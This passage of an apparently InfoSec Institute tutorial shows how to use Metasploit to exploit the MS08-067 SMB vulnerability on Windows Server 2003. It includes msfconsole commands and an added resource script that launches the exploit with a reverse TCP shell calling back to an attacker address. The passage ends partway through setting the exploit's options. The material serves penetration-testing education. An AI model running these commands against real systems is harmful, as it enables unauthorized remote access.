<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_834624" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; position: relative !important;">
<pre><code class="plain plain">msf > run</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Note that this scanner module requires the <em>pcaprub</em> library (the Ruby bindings for libpcap, which Metasploit uses to send and capture raw packets) to be installed before it can scan the target computer's ports. It can be installed and configured as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW5.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW5.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Finally, launch the scan with the <em>run</em> command; it produces the list of open ports on the target computer:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW6.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW6.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Exploiting Vulnerability</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
An exploit only succeeds while the target host still has the corresponding vulnerability unpatched. Metasploit is not primarily a tool for telling you which vulnerabilities a host has, so you would normally use a dedicated <em>vulnerability scanner</em> first. Alternatively, if your <em>port scanner</em> shows a particular port open, you can try each exploit for the service on that port and see whether any of them succeeds. Many Metasploit exploit modules also provide a <em>check</em> command that tests whether the target appears vulnerable without launching a payload, which is a safer first step than firing exploits blindly.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The following demonstration of remote shell access exploits MS08-067, a vulnerability in the Windows Server service that is reached over SMB (port 445) and is commonly found on unpatched Windows XP and Windows Server 2003 systems. We will use Metasploit to get a remote command shell on an unpatched Windows Server 2003 machine. Metasploit lets you pair an exploit with any compatible payload, such as a <em>bind</em> shell or a <em>reverse TCP</em> shell, so with the MS08-067 exploit we can open a command shell, create an administrator account or start a remote VNC session on the victim computer. The real fix is to apply the MS08-067 patch; filtering port 445 at a firewall and running anti-virus with current signatures reduce exposure but do not remove the vulnerability.</div>
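<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The following Metasploit resource script is an added example and is not part of the original article. It chains the steps described above into one file: select the MS08-067 module, run its <em>check</em> command so the host is fingerprinted before any payload is sent, pair the exploit with a reverse TCP shell, and launch it. The target address 192.168.1.10, the attacker address 192.168.1.5, the listening port 4444 and the file name ms08_067.rc are assumed for illustration.</div>

```msf
# ms08_067.rc - added example resource script, not from the original article.
# Run with:  msfconsole -q -r ms08_067.rc
# Addresses, port and file name below are assumptions for this example.

# Select the exploit module discussed in the text
use exploit/windows/smb/ms08_067_netapi

# The target that the port scanner showed with 445/tcp open (assumed address)
set RHOST 192.168.1.10

# Fingerprint the host first: the module's check reports whether it appears
# vulnerable without launching a payload, so a patched host is never exploited
check

# Pair the exploit with a reverse TCP shell: the victim connects back to us,
# which usually passes outbound firewall rules that would block a bind shell
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444

# Target 0 is "Automatic Targeting": the module picks the OS/language target
# from its SMB fingerprint instead of guessing return addresses
set TARGET 0

# Send the exploit and drop into the command shell if it succeeds
exploit
```

<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
If <em>check</em> reports the host as safe or not vulnerable, stop there; the patch is in place and sending the exploit only risks crashing the Server service. A successful run opens a session that you can list with <em>sessions -l</em> and interact with using <em>sessions -i</em> followed by the session number.</div>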
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Remote Shell Access</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We shall exploit the SMB (port 445) vulnerability of the target computer, which runs Windows Server 2003. There are several ways to obtain a reverse shell (a Windows command prompt) on the target; here we use <em>msfconsole</em> and <em>msfcli</em> to achieve the objective.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 13pt;"><strong><em>Msfconsole</em></strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
First open <em>msfconsole</em>. In BackTrack, go to <strong>Backtrack | Exploitation Tools | Network Exploitation Tools | Metasploit Framework | Msfconsole</strong>, or execute the following commands in a terminal:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_13158" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
2</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># cd /pentest/exploits/framework3/</code></div>
<div class="line number2 index1 alt1" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># ./msfconsole</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Next we need the exact module name of the exploit, which is hard to remember from a library of hundreds of modules. Since we are targeting an SMB vulnerability, the simplest way to find it is to search the module database for the SMB keyword:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_578888" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > search smb</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This command lists every module whose name or description matches the SMB keyword, auxiliary scanners as well as exploits. We can display the details of a module, including its targets, options and references, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_744161" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > info windows/smb/ms08_067_netapi</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Once the module's info output confirms that this exploit matches the target (the affected Windows versions and the SMB service it attacks), select it with:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_121863" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: 
auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > use windows/smb/ms08_067_netapi</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The exploit requires a few options to be configured; the essential one is RHOST, the IP address of the target machine (<em>show options</em> lists the remaining options and their defaults, and current Metasploit releases name this option RHOSTS, accepting RHOST as an alias). Set it as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_894779" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
